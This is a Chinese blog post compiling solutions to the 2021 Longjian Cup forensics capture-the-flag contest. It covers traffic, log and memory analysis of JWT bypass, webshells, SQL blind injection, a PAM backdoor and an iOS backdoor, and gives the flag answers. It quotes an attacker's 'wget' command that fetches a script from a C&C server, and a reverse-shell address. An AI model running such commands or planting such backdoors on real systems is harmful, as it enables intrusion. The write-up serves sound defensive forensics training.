陇剑杯 2021 write up整理

最新推荐文章于 2024-06-14 21:05:02 发布

逃课的小学生

最新推荐文章于 2024-06-14 21:05:02 发布

阅读量1.3k

点赞数 1

原文链接：https://blog.csdn.net/weixin_43234021/article/details/120304094?spm=1001.2014.3001.5501

版权

ctf 同时被 3 个专栏收录

30 篇文章 5 订阅

订阅专栏

misc

8 篇文章 0 订阅

订阅专栏

渗透测试

3 篇文章 3 订阅

订阅专栏

竞赛 write up 收集和整理

陇剑杯 2021 write up整理
- 1 签到题
- - 1.1
- 2 JWT
- - 2.1
  - 2.2
  - 2.3
  - 2.4
  - 2.5
  - 2.6
- 3 webshell
- - 3.1
  - 3.2
  - 3.3
  - 3.4
  - 3.5
  - 3.6
  - 3.7
- 4 日志分析
- - 4.1
  - 4.2
  - 4.3
- 5 流量分析
- - 5.1
  - 5.2
  - 5.3
- 6 内存分析
- - 6.1
  - 6.2
- 7 简单日志分析
- - 7.1
  - 7.2
  - 7.3
- 8 SQL注入
- - 8.1
  - 8.2
  - 8.3
- 9 wifi
- - 9.1
- 10 IOS
- - 10.1
  - 10.2
  - 10.3
  - 10.4
  - 10.5
  - 10.6 暂未发现write up
  - 10.7
  - 10.8
- 11 加密的大文件
- - 11.1

陇剑杯 2021 write up整理

1 签到题

1.1

【题目描述】
此时正在进行的可能是＿http＿协议的网络攻击。（如有字母请全部使用小写，填写样例：http，dns，ftp）

【操作内容】
如下图可知，正在进行的可能为 http 协议攻击。
在这里插入图片描述

2 JWT

2.1

【题目描述】
该网站使用了_jwt_认证方式。（如有字母请全部使用小写）

【操作内容】
简单的流量审计，查看登录后的 cookie 可知使用了 jwt 的认证方式。
在这里插入图片描述

2.2

【题目描述】
黑客绕过验证使用的jwt中，id和username是_10087#admin _。

【操作内容】

方法1：简单的流量审计，查看绕过用的 jwt cookie可得id和username为10087#admin。
在这里插入图片描述
方法2：搜索username得到

2.3

【题目描述】
黑客获取webshell之后，权限是_== root==_？

【操作内容】
查看命令执行的结果可得：
在这里插入图片描述

2.4

【题目描述】
黑客上传的恶意文件文件名是_/tem/1.c_。

【操作内容】
查看命令执行内容可得：
在这里插入图片描述

2.5

【题目描述】
黑客在服务器上编译的恶意so文件，文件名是_looter.so_。

【操作内容】
查看命令执行内容可得：
在这里插入图片描述

2.6

【题目描述】
黑客在服务器上修改了一个配置文件，文件的绝对路径为_/etc/pam.d/common-auth_。

【操作内容】
发现文件“looter.so”文件被导向/etc/pam.d/common-auth路径，猜测这里就是被修改的配置文件。
在这里插入图片描述

3 webshell

3.1

【题目描述】
黑客登录系统使用的密码是_Admin123!@#_。

【操作内容】
在流量包中搜索pass、password或者admin，即可查询到密码为“Admin123!@#”。
在这里插入图片描述

3.2

【题目描述】
黑客修改了一个日志文件，文件的绝对路径为_/var/www/html/data/Runtime/Logs/Home/21_08_07.log_。

【操作内容】
对日志进行分析，查看哪个数据包的流跟踪中带有log文件，如下图所示：
在这里插入图片描述

3.3

【题目描述】
黑客获取webshell之后，权限是_ www-data_？

【操作内容】
在这里插入图片描述

3.4

【题目描述】
黑客写入的webshell文件名是_1.php_。

【操作内容】
字符串过滤，对post数据包进行查找和分析，发现第337个数据包post上去了webshell文件，写入的webshell文件名为1.php。
在这里插入图片描述

3.5

【题目描述】
黑客上传的代理工具客户端名字是_frpc_。

【操作内容】
查看上传的配置文件可得客户端名字为frpc。

方法1：
在这里插入图片描述
方法2：

3.6

【题目描述】
黑客代理工具的回连服务端IP是_192.168.239.123_。

【操作内容】
在这里插入图片描述
获得一串十六进制代码，直接010Editor打开

3.7

【题目描述】
黑客的socks5的连接账号、密码是_0HDFt16cLQJ#JTN276Gp_。

【操作内容】
查看上传的配置文件可得账号和密码，如下图所示：
在这里插入图片描述

4 日志分析

4.1

【题目描述】
网络存在源码泄漏，源码文件名是__www.zip__。

【操作内容】
(1) 使用sublime_text编辑器打开access.log文件，删除404所在行的所有信息（ctrl+f，find all，ctrl+L，delete），得到如下信息：
在这里插入图片描述
(2) 使用burpsuit将上图中带有url编码的路径进行url decode，结果如下：

(3) 以上内容可知源码的文件名为www.zip。

4.2

【题目描述】
分析攻击流量，黑客往/tmp目录写入一个文件，文件名为__sess_car__。

【操作内容】
继续分析上一步骤burpsuit解码后的文件，可发现黑客写入的文件为sess_car。
在这里插入图片描述

4.3

【题目描述】
继续分析4.1中burpsuit解码后的文件，可以发现黑客使用了SplFileObject类读取了秘密文件flag。

【操作内容】
在这里插入图片描述

5 流量分析

5.1

【题目描述】
攻击者的IP是____ == 172.18.0.125 ==_________。

【操作内容】
分析pcap流量包，主机ip应该是172.18.0.1，可以看到很多UDP协议的包。在看包内容的时候，注意到UDP包头都是P05=，而且有的是有base64，也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00，其中00的长度是32、01的长度是16，可能是认证。

根据长度为16猜测可能是aes，用长度16的base64（即P05=后面是01 00 00 00的）作为aes key解密发现解密成功了，02 00 00 00对应的包里面都有一个可见字符，其中受害IP172.18.0.125有命令：wget http://147.182.251.98/d.sh。

在这里插入图片描述

5.2

【题目描述】
攻击者所使用的会话密钥是______ ==DtX0GScM9dwrgZht ==_______。

【操作内容】

5.3

【题目描述】
攻击者所控制的C&C服务器IP是____ == 147.182.251.98 ==_________。

【操作内容】
第三问ip即为147.182.251.98（udp.stream eq 85）

6 内存分析

6.1

【题目描述】
虚拟机的密码是____ flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}_________。（密码中为flag{xxxx}，含有空格，提交时不要去掉）

【操作内容】
这里可以使用工具自带的lsadump也可以安装mimikatz插件获取
在这里插入图片描述

6.2

虚拟机中有一个某品牌手机的备份文件，文件里的图片里的字符串为______ flag{TH4NK Y0U FOR DECRYPTING MY DATA}_______。（解题过程中需要用到上一题答案中flag{}内的内容进行处理。本题的格式也是flag{xxx}，含有空格，提交时不要去掉）

【操作内容】
在这里插入图片描述
这里使用filescan扫描CTF用户的文件，发现了华为P40的备份文件

于是把华为备份文件dump出来，同时可以直接在dat文件里把备份文件夹解压出来，再利用工具 kobackupdec
在这里插入图片描述
即可获取flag

7 简单日志分析

7.1

【题目描述】
黑客攻击的参数是_user_（如有字母请全部使用小写）

【操作内容】
1、将日志文件中反馈为404的条目去掉，剩下3条数据包，数据包如下：
在这里插入图片描述

2、对数据包进行分析，即可获得黑客攻击的参数为user，如下图所示：
在这里插入图片描述

7.2

【题目描述】
黑客查看的秘密文件的绝对路径是_/Th4s_IS_VERY_Import_Fi1e_。

【操作内容】
1、将日志文件中反馈为404的条目去掉，剩下3条数据包，数据包如下：
在这里插入图片描述

2、提取get对应的参数，结果如下：
在这里插入图片描述

3、将获取到的参数放入burpsuit进行base64解码，结果如下：
在这里插入图片描述

在这里插入图片描述

因此秘密文件的绝对路径是：/Th4s_IS_VERY_Import_Fi1e。

7.3

【题目描述】
黑客反弹shell的hip和端口是__192.168.2.197:8888__（格式使用"ip：端口"，例如127.0.0.1：2333）

【操作内容】
分析7.2获取到的信息，即可发现反弹shell的ip和端口是：192.168.2.197:8888。
在这里插入图片描述

8 SQL注入

8.1

【题目描述】
黑客在注入过程中采用的注入手法叫__布尔盲注__。（格式为4个汉字，例如"拼博努力"）

【操作内容】
根据注入特征得知为布尔盲注。
在这里插入图片描述

8.2

【题目描述】
黑客在注入过程中，最终获取flag的数据库名、表名和字段名是__sqli#flag#flag__。（格式为“数据库名#表名#字段名"，例如database#tableffcolumn）

【操作内容】
根据日志分析，获取到flag的“数据库名#表名#字段名”分别为“sqli#flag#flag”。
在这里插入图片描述

8.3

【题目描述】
黑客最后获取到的flag字符串为__flag{deddcd67-bcfd-487e-b940-1217e668c7db}__。

【操作内容】

方法1：

1、根据布尔盲注的原理，将access.log文件中多余的数据包去除，只剩下界面为真的数据条目，如下图所示：
在这里插入图片描述

2、将获取到的条目放入burpsuit进行url解码，结果如下：
在这里插入图片描述

3、如此，成功获取到flag的值flag{deddcd67-bcfd-487e-b940-1217e668c7db}。

方法2：正则匹配

# coding : utf-8
import re
from urllib.parse import unquote

file_name = "access_1.log"
pattern_string = "select%20flag%20from%20sqli.flag"
#file_name = input("输入文件名，文件记得要在当前脚本目录下：")
#pattern_string = input("复制个特征值过来，比如select,flag啥的：")
flag = ''

# 打开文件以及读取行数
get_File = open(file_name, "r+")
get_line = get_File.readline()

while get_line:
    get_Data = re.search(pattern_string, get_line)
    if get_Data:
        get_Data_Num = re.search(r'4[7-8][0-1]?.*', get_Data.string)
        if get_Data_Num:
            flag += (re.findall(r"%20=%20\'(.+?)\'", get_Data_Num.string))[0]
            print(unquote(flag[:-1], 'utf-8'))
    get_line = get_File.readline()
get_File.close()

9 wifi

9.1

【题目描述】
小王往upload-labs上传木马后进行了cat /flag，flag内容为_____ flag{5db5b7b0bb74babb66e1522f3a6b1b12}________。（压缩包里有解压密码的提示，需要额外添加花括号）

【操作内容】
分析服务端.pcapng获取1.php

在这里插入图片描述
打开客户端.cap发现是加密的Wi-Fi包

对内存进行分析（看桌面，看admin，意外发现Mywifi.zip）
在这里插入图片描述
这里就需要一个前置知识了

网卡的 GUID 和接口绑定是绑定的，win7的wifi密码就存放在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]中

如果不知道这里，其实也可以使用命令：

getmac /V /S 127.0.0.1

然后再everything搜索一下，因此这里直接搜索Interface。
在这里插入图片描述
解压之后回去xml，里面存在wifi的信息

因此可以解密wifi流量

这里也可以使用如下命令

在这里插入图片描述
解密后可以获取加密返回的信息,到这里基础信息收集完毕了，剩下的就是解密流量了，参考文章：

https://www.freebuf.com/sectool/285693.html
https://blog.csdn.net/zeros__/article/details/111521314

在这里插入图片描述

根据上面的文章可以知道（对于PHP_XOR_BASE64加密方式来说，前后各附加了16位的混淆字符），所以我们拿到的流量要先删除前16位和后16位字符，同时Godzilla的流量还会进行一个gzip压缩，因此最外层还要用gzdecode进行一次解码。
最终解密1198号数据包的时候获取flag

在这里插入图片描述

在5.x的环境中运行获取flag flag{5db5b7b0bb74babb66e1522f3a6b1b12}

最后提供一个非常大神的解决方案，自己用同样的木马连接一下，然后改返回包就行了
在这里插入图片描述

10 IOS

10.1

【题目描述】
黑客所控制的C&C服务器IP是__3.128.156.159__。

【操作内容】
跟进流量中的TCP报文，发现在第15个TCP流中发现明文流量，首先从GitHub中下载了ios_agent后门程序，如下图所示：
在这里插入图片描述
然后与攻击服务器建立连接，如下所示：

得知C&C服务器为3.128.156.159。

10.2

【题目描述】
黑客利用的Github开源项目的名字是__stowaway__。（如有字母请全部使用小写）

【操作内容】
基于github字符串类型过滤流量包内容，匹配到以下数据包：
在这里插入图片描述

在这里插入图片描述

因此下载到的开源项目名称为：stowaway。

10.3

【题目描述】
通讯加密密钥的明文是__hack4sec__。

【操作内容】
根据TCP流量，得知该ios_agent的加密密钥明文hack4sec，如下图所示：
在这里插入图片描述

10.4

【题目描述】
盲注拿到了一个敏感数据__746558f3-c841-456b-85d7-d6c0f2edabb2__。

【操作内容】
这里需要先对TLS数据流进行解密。首选项，TLS 选择keylog.txt
在这里插入图片描述

数据流过滤为http2,然后对数据流进行盲注分析（这里我进行了导出并进行了urldecode）
在这里插入图片描述

这个题跟上面的日志分析一样，最后hex转一下就可以了

746558f3-c841-456b-85d7-d6c0f2edabb2

10.5

【题目描述】
黑客端囗扫描的扫描器的扫描范围是__10-499__。（格式使用“开始端口-结束端口”）

【操作内容】
1、基于跳板服务器进行分析，可以发现其一直进行端口扫描的目标ip为192.168.1.12，wireshark过滤后结果如下图：
在这里插入图片描述
2、因此扫描器的扫描范围为：10-499。

10.6 暂未发现write up

【题目描述】
被害者手机上被拿走了的私钥文件内容是___________。

【操作内容】

10.7

【题目描述】
黑客访问/攻击了内网的几个服务器，IP地址为__172.28.0.2#192.168.1.12__。

【操作内容】
方法1：access.log很明显的，172.28.0.2为已被攻击。结合上题被疯狂扫描，认为是192.168.1.12。

方法2：跳板机地址为192.168.1.8，通过科来分析源ip为192.168.1.8，目标地址为本地ip的tcp流量，发现两个IP：172.28.0.2#192.168.1.12。

10.8

【题目描述】
黑客写入了一个webshell，其密码为__fxxk__。

【操作内容】
分析提供的access.log即可获得到写入的webshell密码fxxk。
在这里插入图片描述

11 加密的大文件

11.1

【题目描述】

【操作内容】

逃课的小学生

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
2
评论
陇剑杯 2021 write up整理

竞赛 write up 收集和整理陇剑杯 2021 write up整理1 签到题1.12 JWT2.12.22.32.42.52.63 webshell3.13.23.33.43.53.63.74 日志分析4.14.24.35 流量分析5.15.25.36 内存分析6.16.27 简单日志分析7.17.27.38 SQL注入8.18.28.39 wifi9.110 IOS10.110.210.310.410.510.6 暂未发现write up10.710.811 加密的大文件11.1陇剑杯 202
复制链接

扫一扫